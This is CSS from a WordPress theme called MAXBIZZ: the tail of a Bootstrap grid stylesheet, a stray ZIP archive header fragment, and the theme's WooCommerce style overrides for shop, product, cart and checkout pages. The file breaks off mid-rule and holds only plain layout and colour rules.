(min-width:1230px){.container{width:1200px}}.row{margin-left:-15px;margin-right:-15px}.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9,.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9{position:relative;min-height:1px;padding-left:15px;padding-right:15px}.col-xs-1,.col-xs-10,.col-xs-11,.col-xs-12,.col-xs-2,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9{float:left}.col-xs-12{width:100%}.col-xs-11{width:91.66666667%}.col-xs-10{width:83.33333333%}.col-xs-9{width:75%}.col-xs-8{width:66.66666667%}.col-xs-7{width:58.33333333%}.col-xs-6{width:50%}.col-xs-5{width:41.66666667%}.col-xs-4{width:33.33333333%}.col-xs-3{width:25%}.col-xs-2{width:16.66666667%}.col-xs-1{width:8.33333333%}.col-xs-pull-12{right:100%}.col-xs-pull-11{right:91.66666667%}.col-xs-pull-10{right:83.33333333%}.col-xs-pull-9{right:75%}.col-xs-pull-8{right:66.66666667%}.col-xs-pull-7{right:58.33333333%}.col-xs-pull-6{right:50%}.col-xs-pull-5{right:41.66666667%}.col-xs-pull-4{right:33.33333333%}.col-xs-pull-3{right:25%}.col-xs-pull-2{right:16.66666667%}.col-xs-pull-1{right:8.33333333%}.col-xs-pull-0{right:auto}.col-xs-push-12{left:100%}.col-xs-push-11{left:91.66666667%}.col-xs-push-10{left:83.33333333%}.col-xs-push-9{left:75%}.col-xs-push-8{left:66.66666667%}.col-xs-push-7{left:58.33333333%}.col-xs-push-6{left:50%}.col-xs-push-5{left:41.66666667%}.col-xs-push-4{left:33.33333333%}.col-xs-push-3{left:25%}.col-xs-push-2{left:16.66666667%}.col-xs-push-1{left:8.33333333%}.col-xs-push-0{left:auto}.col-xs-offset-12{margin-left:100%}.col-xs-offset-11{margin-left:91.66666667%}.col-xs-offset-10{margin-left:83.33333333%}.col-xs-offset-9{margin-left:75%}.col-xs-offset-8{margin-left:66.66666667%}.col-xs-offset-7{margin-left:58.33333333%}.col-xs-offset-6{margin-left:50%}.col-xs-offset-5{margin-left:41.66666667%}.col-xs-offset-4{margin-left:33.33333333%}.col-xs-offset-3{margin-left:25%}.col-xs-offset-2{margin-left:16.66666667%}.col-xs-offset-1{margin-left:8.33333333%}.col-xs-offset-0{margin-left:0}@media (min-width:768px){.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9{float:left}.col-sm-12{width:100%}.col-sm-11{width:91.66666667%}.col-sm-10{width:83.33333333%}.col-sm-9{width:75%}.col-sm-8{width:66.66666667%}.col-sm-7{width:58.33333333%}.col-sm-6{width:50%}.col-sm-5{width:41.66666667%}.col-sm-4{width:33.33333333%}.col-sm-3{width:25%}.col-sm-2{width:16.66666667%}.col-sm-1{width:8.33333333%}.col-sm-pull-12{right:100%}.col-sm-pull-11{right:91.66666667%}.col-sm-pull-10{right:83.33333333%}.col-sm-pull-9{right:75%}.col-sm-pull-8{right:66.66666667%}.col-sm-pull-7{right:58.33333333%}.col-sm-pull-6{right:50%}.col-sm-pull-5{right:41.66666667%}.col-sm-pull-4{right:33.33333333%}.col-sm-pull-3{right:25%}.col-sm-pull-2{right:16.66666667%}.col-sm-pull-1{right:8.33333333%}.col-sm-pull-0{right:auto}.col-sm-push-12{left:100%}.col-sm-push-11{left:91.66666667%}.col-sm-push-10{left:83.33333333%}.col-sm-push-9{left:75%}.col-sm-push-8{left:66.66666667%}.col-sm-push-7{left:58.33333333%}.col-sm-push-6{left:50%}.col-sm-push-5{left:41.66666667%}.col-sm-push-4{left:33.33333333%}.col-sm-push-3{left:25%}.col-sm-push-2{left:16.66666667%}.col-sm-push-1{left:8.33333333%}.col-sm-push-0{left:auto}.col-sm-offset-12{margin-left:100%}.col-sm-offset-11{margin-left:91.66666667%}.col-sm-offset-10{margin-left:83.33333333%}.col-sm-offset-9{margin-left:75%}.col-sm-offset-8{margin-left:66.66666667%}.col-sm-offset-7{margin-left:58.33333333%}.col-sm-offset-6{margin-left:50%}.col-sm-offset-5{margin-left:41.66666667%}.col-sm-offset-4{margin-left:33.33333333%}.col-sm-offset-3{margin-left:25%}.col-sm-offset-2{margin-left:16.66666667%}.col-sm-offset-1{margin-left:8.33333333%}.col-sm-offset-0{margin-left:0}}@media (min-width:992px){.col-md-1,.col-md-10,.col-md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9{float:left}.col-md-12{width:100%}.col-md-11{width:91.66666667%}.col-md-10{width:83.33333333%}.col-md-9{width:75%}.col-md-8{width:66.66666667%}.col-md-7{width:58.33333333%}.col-md-6{width:50%}.col-md-5{width:41.66666667%}.col-md-4{width:33.33333333%}.col-md-3{width:25%}.col-md-2{width:16.66666667%}.col-md-1{width:8.33333333%}.col-md-pull-12{right:100%}.col-md-pull-11{right:91.66666667%}.col-md-pull-10{right:83.33333333%}.col-md-pull-9{right:75%}.col-md-pull-8{right:66.66666667%}.col-md-pull-7{right:58.33333333%}.col-md-pull-6{right:50%}.col-md-pull-5{right:41.66666667%}.col-md-pull-4{right:33.33333333%}.col-md-pull-3{right:25%}.col-md-pull-2{right:16.66666667%}.col-md-pull-1{right:8.33333333%}.col-md-pull-0{right:auto}.col-md-push-12{left:100%}.col-md-push-11{left:91.66666667%}.col-md-push-10{left:83.33333333%}.col-md-push-9{left:75%}.col-md-push-8{left:66.66666667%}.col-md-push-7{left:58.33333333%}.col-md-push-6{left:50%}.col-md-push-5{left:41.66666667%}.col-md-push-4{left:33.33333333%}.col-md-push-3{left:25%}.col-md-push-2{left:16.66666667%}.col-md-push-1{left:8.33333333%}.col-md-push-0{left:auto}.col-md-offset-12{margin-left:100%}.col-md-offset-11{margin-left:91.66666667%}.col-md-offset-10{margin-left:83.33333333%}.col-md-offset-9{margin-left:75%}.col-md-offset-8{margin-left:66.66666667%}.col-md-offset-7{margin-left:58.33333333%}.col-md-offset-6{margin-left:50%}.col-md-offset-5{margin-left:41.66666667%}.col-md-offset-4{margin-left:33.33333333%}.col-md-offset-3{margin-left:25%}.col-md-offset-2{margin-left:16.66666667%}.col-md-offset-1{margin-left:8.33333333%}.col-md-offset-0{margin-left:0}}@media (min-width:1200px){.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-2,.col-lg-3,.col-lg-4,.col-lg-5,.col-lg-6,.col-lg-7,.col-lg-8,.col-lg-9{float:left}.col-lg-12{width:100%}.col-lg-11{width:91.66666667%}.col-lg-10{width:83.33333333%}.col-lg-9{width:75%}.col-lg-8{width:66.66666667%}.col-lg-7{width:58.33333333%}.col-lg-6{width:50%}.col-lg-5{width:41.66666667%}.col-lg-4{width:33.33333333%}.col-lg-3{width:25%}.col-lg-2{width:16.66666667%}.col-lg-1{width:8.33333333%}.col-lg-pull-12{right:100%}.col-lg-pull-11{right:91.66666667%}.col-lg-pull-10{right:83.33333333%}.col-lg-pull-9{right:75%}.col-lg-pull-8{right:66.66666667%}.col-lg-pull-7{right:58.33333333%}.col-lg-pull-6{right:50%}.col-lg-pull-5{right:41.66666667%}.col-lg-pull-4{right:33.33333333%}.col-lg-pull-3{right:25%}.col-lg-pull-2{right:16.66666667%}.col-lg-pull-1{right:8.33333333%}.col-lg-pull-0{right:auto}.col-lg-push-12{left:100%}.col-lg-push-11{left:91.66666667%}.col-lg-push-10{left:83.33333333%}.col-lg-push-9{left:75%}.col-lg-push-8{left:66.66666667%}.col-lg-push-7{left:58.33333333%}.col-lg-push-6{left:50%}.col-lg-push-5{left:41.66666667%}.col-lg-push-4{left:33.33333333%}.col-lg-push-3{left:25%}.col-lg-push-2{left:16.66666667%}.col-lg-push-1{left:8.33333333%}.col-lg-push-0{left:auto}.col-lg-offset-12{margin-left:100%}.col-lg-offset-11{margin-left:91.66666667%}.col-lg-offset-10{margin-left:83.33333333%}.col-lg-offset-9{margin-left:75%}.col-lg-offset-8{margin-left:66.66666667%}.col-lg-offset-7{margin-left:58.33333333%}.col-lg-offset-6{margin-left:50%}.col-lg-offset-5{margin-left:41.66666667%}.col-lg-offset-4{margin-left:33.33333333%}.col-lg-offset-3{margin-left:25%}.col-lg-offset-2{margin-left:16.66666667%}.col-lg-offset-1{margin-left:8.33333333%}.col-lg-offset-0{margin-left:0}}.clearfix:after,.clearfix:before,.container-fluid:after,.container-fluid:before,.container:after,.container:before,.row:after,.row:before{content:" ";display:table}.clearfix:after,.container-fluid:after,.container:after,.row:after{clear:both}.center-block{display:block;margin-left:auto;margin-right:auto}.pull-right{float:right!important}.pull-left{float:left!important}.hide{display:none!important}.show{display:block!important}.invisible{visibility:hidden}.text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.hidden{display:none!important}.affix{position:fixed}PK�8FZ��A&�k�kcss/woocommerce.cssnu�[���/*
Theme Name: MAXBIZZ

WooCommerce styles override
*/
/**
 * WooCommerce color variables
 */
/**
 * Imports
 */
/**
 * Shop tables
 */
/**
 * Products
 */
.content-product-wrapper {
  padding: 90px 0px 110px;
}

.woocommerce .woocommerce-result-count {
  color: #5f5f5f;
  font-size: 14px;
  margin: 14px 0px 0px 0px;
}

.woocommerce .woocommerce-ordering {
  margin-bottom: 30px;
}
.woocommerce .woocommerce-ordering .orderby {
  -webkit-appearance: none;
  -moz-appearance: none;
  appearance: none;
  color: #7e7e7e;
  height: 45px;
  line-height: 45px;
  outline: none;
  border-color: #dbdbdb;
  padding: 0px 40px 0 17px;
  background-image: linear-gradient(45deg, transparent 50%, #c3c7c9 50%), linear-gradient(135deg, #c3c7c9 50%, transparent 50%);
  background-position: calc(100% - 24px) calc(1em + 6px), calc(100% - 19px) calc(1em + 6px), 100% 0;
  background-size: 5px 5px, 5px 5px, 2.5em 2.5em;
  background-repeat: no-repeat;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}

.woocommerce ul.products li.product .star-rating,
.woocommerce .woocommerce-product-rating .star-rating {
  height: 15px;
  font-size: 15px;
  letter-spacing: 4px;
  width: 6.7em;
  margin: 10px auto;
  text-align: left;
}

.woocommerce .star-rating::before {
  color: #ffbe4e;
}

.woocommerce .star-rating span {
  color: #ffbe4e;
}

.woocommerce ul.products, .woocommerce-page ul.products {
  margin: 0px;
  padding: 0px;
}
.woocommerce ul.products li.product, .woocommerce-page ul.products li.product {
  list-style: none;
  font-family: "Inter", sans-serif;
  text-align: center;
  margin-bottom: 35px;
  padding: 30px 20px;
  border: 1px solid #dbdbdb;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.woocommerce ul.products li.product .product-media, .woocommerce-page ul.products li.product .product-media {
  position: relative;
}
.woocommerce ul.products li.product .product-media img, .woocommerce-page ul.products li.product .product-media img {
  margin-bottom: 0;
}
.woocommerce ul.products li.product .woocommerce-loop-product__title, .woocommerce-page ul.products li.product .woocommerce-loop-product__title {
  font-size: 18px;
  line-height: 28px;
  color: #1a1b1e;
  font-weight: 700;
  margin-top: 20px;
  margin-bottom: 3px;
  padding: 0px;
}
.woocommerce ul.products li.product .woocommerce-loop-product__title a, .woocommerce-page ul.products li.product .woocommerce-loop-product__title a {
  color: #1a1b1e;
}
.woocommerce ul.products li.product .price, .woocommerce-page ul.products li.product .price {
  font-weight: 600;
  font-size: 16px;
  line-height: 28px;
  display: inline-block;
  margin-bottom: 0;
}
.woocommerce ul.products li.product .price .woocommerce-Price-amount, .woocommerce-page ul.products li.product .price .woocommerce-Price-amount {
  color: #fe8423;
}
.woocommerce ul.products li.product .price del, .woocommerce-page ul.products li.product .price del {
  color: #636363;
  margin-right: 5px;
}
.woocommerce ul.products li.product .price del .woocommerce-Price-amount, .woocommerce-page ul.products li.product .price del .woocommerce-Price-amount {
  color: #636363;
}
.woocommerce ul.products li.product .price ins, .woocommerce-page ul.products li.product .price ins {
  background: transparent;
}
.woocommerce ul.products li.product .wrapper-add-to-cart, .woocommerce-page ul.products li.product .wrapper-add-to-cart {
  visibility: hidden;
  opacity: 0;
  width: 100%;
  position: absolute;
  left: 0;
  bottom: -50px;
  z-index: 2;
  transition: all 0.3s ease-in-out;
  -webkit-transition: all 0.3s ease-in-out;
  -moz-transition: all 0.3s ease-in-out;
  -o-transition: all 0.3s ease-in-out;
  -ms-transition: all 0.3s ease-in-out;
}
.woocommerce ul.products li.product .add_to_cart_button, .woocommerce-page ul.products li.product .add_to_cart_button {
  display: block;
  margin-top: 0px;
  padding: 20px 23px;
  -webkit-transform: translateY(20px);
  -ms-transform: translateY(20px);
  transform: translateY(20px);
  transition: all 0.3s ease-in-out;
  -webkit-transition: all 0.3s ease-in-out;
  -moz-transition: all 0.3s ease-in-out;
  -o-transition: all 0.3s ease-in-out;
  -ms-transition: all 0.3s ease-in-out;
}
.woocommerce ul.products li.product .add_to_cart_button:hover, .woocommerce-page ul.products li.product .add_to_cart_button:hover {
  background: #1b1d21;
}
.woocommerce ul.products li.product .add_to_cart_button.added, .woocommerce-page ul.products li.product .add_to_cart_button.added {
  display: none;
}
.woocommerce ul.products li.product .added_to_cart, .woocommerce ul.products li.product .product_type_grouped, .woocommerce-page ul.products li.product .added_to_cart, .woocommerce-page ul.products li.product .product_type_grouped {
  display: block;
  width: 100%;
  margin-top: 0px;
  padding: 20px 23px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  font-size: 14px;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
  padding: 14px 30px;
  line-height: 1.42857143;
  display: inline-block;
  margin-bottom: 0;
  text-decoration: none;
  text-transform: uppercase;
  white-space: nowrap;
  vertical-align: middle;
  font-family: "Inter", sans-serif;
  font-weight: 600;
  text-align: center;
  background: #fe8423;
  cursor: pointer;
  border: 1px solid transparent;
  color: #fff;
  outline: none;
  position: relative;
}
.woocommerce ul.products li.product .added_to_cart:hover, .woocommerce ul.products li.product .added_to_cart:focus, .woocommerce ul.products li.product .product_type_grouped:hover, .woocommerce ul.products li.product .product_type_grouped:focus, .woocommerce-page ul.products li.product .added_to_cart:hover, .woocommerce-page ul.products li.product .added_to_cart:focus, .woocommerce-page ul.products li.product .product_type_grouped:hover, .woocommerce-page ul.products li.product .product_type_grouped:focus {
  background: #1b1d21;
}
.woocommerce ul.products li.product .added_to_cart i, .woocommerce ul.products li.product .product_type_grouped i, .woocommerce-page ul.products li.product .added_to_cart i, .woocommerce-page ul.products li.product .product_type_grouped i {
  margin-right: 12px;
}
.woocommerce ul.products li.product .added_to_cart:hover, .woocommerce ul.products li.product .product_type_grouped:hover, .woocommerce-page ul.products li.product .added_to_cart:hover, .woocommerce-page ul.products li.product .product_type_grouped:hover {
  background: #1b1d21;
}
.woocommerce ul.products li.product:hover .wrapper-add-to-cart, .woocommerce-page ul.products li.product:hover .wrapper-add-to-cart {
  visibility: visible;
  opacity: 1;
}
.woocommerce ul.products li.product:hover .add_to_cart_button, .woocommerce-page ul.products li.product:hover .add_to_cart_button {
  -webkit-transform: translateY(0px);
  -ms-transform: translateY(0px);
  transform: translateY(0px);
}

.woocommerce .site-main .product.sale span.onsale {
  color: #fff;
  font-size: 11px;
  text-transform: uppercase;
  font-weight: 700;
  letter-spacing: 0.5px;
  background-color: #ff5723;
  padding: 6px 9px;
  line-height: 1;
  position: absolute;
  top: -42px;
  left: -10px;
  right: auto;
  min-height: auto;
  min-width: auto;
  margin: 0px;
  z-index: 1;
  -webkit-border-radius: 12px;
  -moz-border-radius: 12px;
  border-radius: 12px;
}

.wc-pagination {
  text-align: center;
}
.wc-pagination .page-pagination {
  margin-top: 10px;
}

#order_review_heading {
  margin-top: 30px;
}

.woocommerce-error, .woocommerce-info, .woocommerce-message {
  background-color: #EFF6FF;
}

@media (max-width: 479px) {
  .woocommerce .woocommerce-result-count,
.woocommerce-page .woocommerce-result-count {
    float: none;
  }

  .woocommerce .woocommerce-ordering,
.woocommerce-page .woocommerce-ordering {
    float: left;
    margin-top: 10px;
    border: none;
    padding: 0;
    background: transparent;
  }

  .woocommerce div ul.products[class*=columns-] li.product,
.woocommerce-page div ul.products[class*=columns-] li.product {
    width: 100%;
  }

  .woocommerce #reviews #comments ol.commentlist li img.avatar {
    position: static;
    float: none;
  }

  .woocommerce div #reviews #comments ol.commentlist li .comment-text {
    margin-left: 0;
    margin-top: 20px;
  }

  .woocommerce div .woocommerce-ordering .orderby {
    padding: 0;
    border: none;
  }
}
/**
 * Single product
 */
.single-product div.product p.price del,
.single-product div.product span.price del {
  color: #636363;
}
.single-product div.product p.price del .woocommerce-Price-amount,
.single-product div.product span.price del .woocommerce-Price-amount {
  color: #636363;
}

.single-product h2.page-title {
  font-size: 42px;
}
.single-product h1.product_title {
  font-size: 36px;
  margin-bottom: 5px;
}
.single-product div.product .woocommerce-product-rating {
  margin-bottom: 5px;
}
.single-product .woocommerce-tabs h2 {
  font-size: 24px;
  font-weight: 600;
}
.single-product .woocommerce-tabs .comment-reply-title {
  font-size: 24px;
  font-weight: 600;
  color: #1b1d21;
}
.single-product .woocommerce-product-gallery__image,
.single-product div.product div.images .flex-control-thumbs li img {
  border: 1px solid #dbdbdb;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.single-product .site-main > .product.sale > span.onsale {
  top: -12px;
  left: 20px;
}

.woocommerce div.product div.images .woocommerce-product-gallery__wrapper .zoomImg {
  border: 1px solid #dbdbdb;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}

.woocommerce #reviews #comments ol.commentlist {
  padding-left: 0;
}

.woocommerce #reviews #comments ol.commentlist li img.avatar {
  width: auto;
  border-radius: 50%;
  padding: 0;
  border: none;
}

.woocommerce #reviews #comments ol.commentlist li .comment-text {
  margin-left: 90px;
  padding: 20px 23px 3px;
}

.woocommerce #review_form #respond {
  box-shadow: none;
}
.woocommerce #review_form #respond textarea {
  height: 200px;
}

.woocommerce div.product form.cart {
  margin-top: 2em;
}

.woocommerce div.product form.cart div.quantity {
  margin-right: 14px;
}

#reviews .comment-form-rating {
  margin-bottom: 15px;
}

#reviews .comment-form p label {
  margin: 0 0 10px;
  display: inline-block;
}

#tab-description p:last-child {
  margin-bottom: 0;
}

.woocommerce div.product div.images .woocommerce-product-gallery__trigger {
  width: 40px;
  height: 40px;
}
.woocommerce div.product div.images .woocommerce-product-gallery__trigger:before {
  top: 11px;
  left: 11px;
}
.woocommerce div.product div.images .woocommerce-product-gallery__trigger:after {
  top: 21px;
  left: 24px;
}

.woocommerce .woocommerce-product-gallery.woocommerce-product-gallery--with-images .flex-viewport,
.woocommerce-product-gallery__image {
  margin-bottom: 20px;
}

.woocommerce div.product div.images .flex-control-thumbs {
  margin-left: -20px;
}
.woocommerce div.product div.images .flex-control-thumbs li {
  padding-left: 20px;
}

.woocommerce div.product .woocommerce-tabs ul.tabs {
  padding: 0;
  margin: 0 0 1.618em;
  overflow: visible;
  display: inline-block;
}
.woocommerce div.product .woocommerce-tabs ul.tabs:before {
  border-bottom: 0px solid #d3ced2;
}
.woocommerce div.product .woocommerce-tabs ul.tabs li {
  border: 0;
  background-color: transparent;
  border-radius: 0;
  margin-right: 30px;
  padding: 0;
}
.woocommerce div.product .woocommerce-tabs ul.tabs li:after, .woocommerce div.product .woocommerce-tabs ul.tabs li:before {
  border: 0px solid #d3ced2;
  bottom: 0px;
  width: 0px;
  height: 0px;
}
.woocommerce div.product .woocommerce-tabs ul.tabs li a {
  display: inline-block;
  padding: 15px 30px;
  min-width: 177px;
  text-align: center;
  font-weight: 600;
  color: #1b1d21;
  text-transform: uppercase;
  font-size: 14px;
  border-bottom: 3px solid #d7d7d7;
  transition: all 0.35s ease-in-out;
  -webkit-transition: all 0.35s ease-in-out;
  -moz-transition: all 0.35s ease-in-out;
  -o-transition: all 0.35s ease-in-out;
  -ms-transition: all 0.35s ease-in-out;
}
.woocommerce div.product .woocommerce-tabs ul.tabs li a:hover {
  border-color: #fe8423;
}
.woocommerce div.product .woocommerce-tabs ul.tabs li.active a {
  border-color: #fe8423;
  color: #1b1d21;
}

.woocommerce table.shop_attributes td p {
  padding: 8px;
}

.related.products {
  padding-top: 30px;
}
.related.products h2 {
  margin-bottom: 30px;
  font-size: 30px;
}

/**
 * Checkout
 */
.woocommerce a.remove {
  font-weight: 400;
}

.woocommerce-cart-form table, .woocommerce-cart-form th, .woocommerce-cart-form td {
  border: 0px solid #eee;
}

.woocommerce table.shop_table {
  font-family: "Inter", sans-serif;
  font-weight: 600;
  color: #1b1d21;
  border: none;
  border-collapse: collapse;
}
.woocommerce table.shop_table.cart th {
  background: #f5f5f5;
  text-transform: uppercase;
}
.woocommerce table.shop_table th {
  font-weight: 600;
  padding-top: 15px;
  padding-bottom: 15px;
}
.woocommerce table.shop_table td {
  padding: 15px 12px;
}
.woocommerce table.shop_table td.product-name a {
  color: #1a1b1e;
  font-size: 16px;
  font-weight: 600;
}
.woocommerce table.shop_table td.product-price, .woocommerce table.shop_table td.product-subtotal {
  color: #fe8423;
}
.woocommerce table.shop_table td.actions {
  padding-top: 40px;
  padding-bottom: 25px;
}

.woocommerce-page #content table.cart td.actions .input-text {
  width: 300px;
  padding: 9px 20px;
}

.woocommerce .cart-collaterals .cart_totals,
.woocommerce-page .cart-collaterals .cart_totals {
  width: 375px;
  padding: 25px;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
}

.woocommerce-cart .wc-proceed-to-checkout {
  padding-bottom: 0;
}
.woocommerce-cart .wc-proceed-to-checkout a.checkout-button {
  margin-bottom: 0;
}

#add_payment_method table.cart img, .woocommerce-cart table.cart img,
.woocommerce-checkout table.cart img {
  width: 70px;
  -webkit-border-radius: 10px;
  -moz-border-radius: 10px;
  border-radius: 10px;
}

.woocommerce .quantity .qty {
  color: #1a1b1e;
  border: none;
  background-color: #f6f6f6;
  padding: 15px;
  text-align: center;
  width: 85px;
  height: 46px;
  line-height: 46px;
  font-family: "Inter", sans-serif;
  font-size: 16px;
  font-weight: 700;
}

.woocommerce #content table.cart td.actions,
.woocommerce table.cart td.actions,
.woocommerce-page #content table.cart td.actions,
.woocommerce-page table.cart td.actions {
  padding-top: 25px;
}

.woocommerce #content table.cart td.actions .input-text,
.woocommerce table.cart td.actions .input-text,
.woocommerce-page #content table.cart td.actions .input-text,
.woocommerce-page table.cart td.actions .input-text,
.woocommerce form .form-row .input-text, .woocommerce-page form .form-row .input-text {
  width: 300px;
  padding: 20px;
  height: 47px;
  line-height: 47px;
  margin: 0 10px 0 0;
  color: #7e7e7e;
}

#add_payment_method table.cart td.actions .coupon .input-text,
.woocommerce-cart table.cart td.actions .coupon .input-text,
.woocommerce-checkout table.cart td.actions .coupon .input-text {
  border-color: #e6e6e6;
  color: #7e7e7e;
}

.woocommerce-message {
  border-top-color: #fe8423;
}
.woocommerce-message:before {
  color: #fe8423;
}

.woocommerce-info {
  border-top-color: #fe8423;
}
.woocommerce-info:before {
  color: #fe8423;
}

.woocommerce .cart-collaterals,
.woocommerce-page .cart-collaterals {
  padding-top: 20px;
}

.cart_totals h2 {
  font-size: 24px;
  font-family: "Inter", sans-serif;
  font-weight: 700;
}

#add_payment_method .cart-collaterals .cart_totals table td, #add_payment_method .cart-collaterals .cart_totals table th,
.woocommerce-cart .cart-collaterals .cart_totals table td, .woocommerce-cart .cart-collaterals .cart_totals table th,
.woocommerce-checkout .cart-collaterals .cart_totals table td, .woocommerce-checkout .cart-collaterals .cart_totals table th {
  font-size: 18px;
  font-family: "Inter", sans-serif;
  font-weight: 600;
  line-height: 24px;
  color: #1a1b1e;
  padding: 9px 10px;
  border: none;
}
#add_payment_method .cart-collaterals .cart_totals table td .woocommerce-Price-amount, #add_payment_method .cart-collaterals .cart_totals table th .woocommerce-Price-amount,
.woocommerce-cart .cart-collaterals .cart_totals table td .woocommerce-Price-amount, .woocommerce-cart .cart-collaterals .cart_totals table th .woocommerce-Price-amount,
.woocommerce-checkout .cart-collaterals .cart_totals table td .woocommerce-Price-amount, .woocommerce-checkout .cart-collaterals .cart_totals table th .woocommerce-Price-amount {
  font-weight: 700;
}

#add_payment_method .cart-collaterals .cart_totals table th,
.woocommerce-cart .cart-collaterals .cart_totals table th,
.woocommerce-checkout .cart-collaterals .cart_totals table th {
  padding-left: 0px;
}

.woocommerce-cart .cart-collaterals .cart_totals table td {
  padding-right: 0px;
  text-align: right;
}

.select2-container--default .select2-selection--single {
  background-color: #f6f6f6;
  border-color: #e6e6e6;
}

.select2-container .select2-selection--single {
  height: 47px;
  line-height: 47px;
}

.select2-container--default .select2-selection--single .select2-selection__rendered {
  color: #7e7e7e;
  line-height: 47px;
}

.select2-container--default .select2-selection--single .select2-selection__arrow {
  top: 10px;
  right: 20px;
}

.select2-container .select2-selection--single .select2-selection__rendered {
  padding-left: 20px;
}

.woocommerce table.shop_table.woocommerce-checkout-review-order-table tbody th,
.woocommerce table.shop_table.woocommerce-checkout-review-order-table tbody td,
.woocommerce table.shop_table.woocommerce-checkout-review-order-table tfoot td,
.woocommerce table.shop_table.woocommerce-checkout-review-order-table tfoot th {
  border-top: 1px solid #e6e6e6;
}

.woocommerce form.woocommerce-form-coupon .form-row {
  width: 50%;
}

.woocommerce-shipping-fields input {
  margin-right: 6px;
  vertical-align: middle;
}

.woocommerce-page .woocommerce-additional-fields .form-row textarea {
  height: 100px;
  width: 100%;
}

.woocommerce-checkout h3 {
  font-size: 26px;
}

@media (max-width: 479px) {
  .woocommerce-page #content table.cart td.actions .coupon input.input-text,
.woocommerce-page #content table.cart td.actions .coupon button.button {
    width: 100%;
    margin-bottom: 14px;
  }

  .woocommerce form.woocommerce-form-coupon .form-row,
.woocommerce .cart-collaterals .cart_totals,
.woocommerce-page .cart-collaterals .cart_totals {
    width: 100%;
  }
}
/**
 * General WooCommerce components
 */
.woocommerce #respond input#submit.disabled, .woocommerce #respond input#submit:disabled,
.woocommerce #respond input#submit:disabled[disabled], .woocommerce a.button.disabled,
.woocommerce a.button:disabled, .woocommerce a.button:disabled[disabled], .woocommerce button.button.disabled,
.woocommerce button.button:disabled, .woocommerce button.button:disabled[disabled],
.woocommerce input.button.disabled, .woocommerce input.button:disabled, .woocommerce input.button:disabled[disabled],
.woocommerce #respond input#submit, .woocommerce a.button,
.woocommerce button.button, .woocommerce input.button,
.woocommerce #respond input#submit.alt, .woocommerce a.button.alt,
.woocommerce button.button.alt, .woocommerce input.button.alt {
  overflow: hidden;
  font-size: 14px;
  font-weight: 600;
  text-transform: uppercase;
  padding: 16px 30px;
  outline: none;
  color: #fff;
  transition: all 0.3s;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.woocommerce #respond input#submit.disabled:hover, .woocommerce #respond input#submit:disabled:hover,
.woocommerce #respond input#submit:disabled[disabled]:hover, .woocommerce a.button.disabled:hover,
.woocommerce a.button:disabled:hover, .woocommerce a.button:disabled[disabled]:hover, .woocommerce button.button.disabled:hover,
.woocommerce button.button:disabled:hover, .woocommerce button.button:disabled[disabled]:hover,
.woocommerce input.button.disabled:hover, .woocommerce input.button:disabled:hover, .woocommerce input.button:disabled[disabled]:hover,
.woocommerce #respond input#submit:hover, .woocommerce a.button:hover,
.woocommerce button.button:hover, .woocommerce input.button:hover,
.woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover,
.woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover {
  color: #fff;
}

.woocommerce #respond input#submit.alt, .woocommerce a.button.alt,
.woocommerce button.button.alt, .woocommerce input.button.alt,
.woocommerce #respond input#submit, .woocommerce a.button,
.woocommerce input.button, .woocommerce button.button.alt.disabled {
  background-color: #fe8423;
}
.woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover,
.woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover,
.woocommerce #respond input#submit:hover, .woocommerce a.button:hover,
.woocommerce input.button:hover, .woocommerce button.button.alt.disabled:hover {
  background-color: #1b1d21;
}

.woocommerce button.button {
  background-color: #fe8423;
}
.woocommerce button.button:hover {
  background-color: #1b1d21;
}

/**
 * WooCommerce widgets
 */
/* widget product */
.woocommerce .woocommerce-Price-amount {
  color: #fe8423;
  font-weight: 600;
}
.woocommerce .site ul.product_list_widget li {
  margin-bottom: 28px;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  align-items: center;
}
.woocommerce .site ul.product_list_widget li .widget-prthumb {
  margin-right: 20px;
  min-width: 70px;
  border: 1px solid #dbdbdb;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.woocommerce .site ul.product_list_widget li .widget-prthumb img {
  width: 70px;
  margin-left: 0;
  float: none;
}
.woocommerce .site ul.product_list_widget li.mini_cart_item img {
  width: 70px;
  float: left;
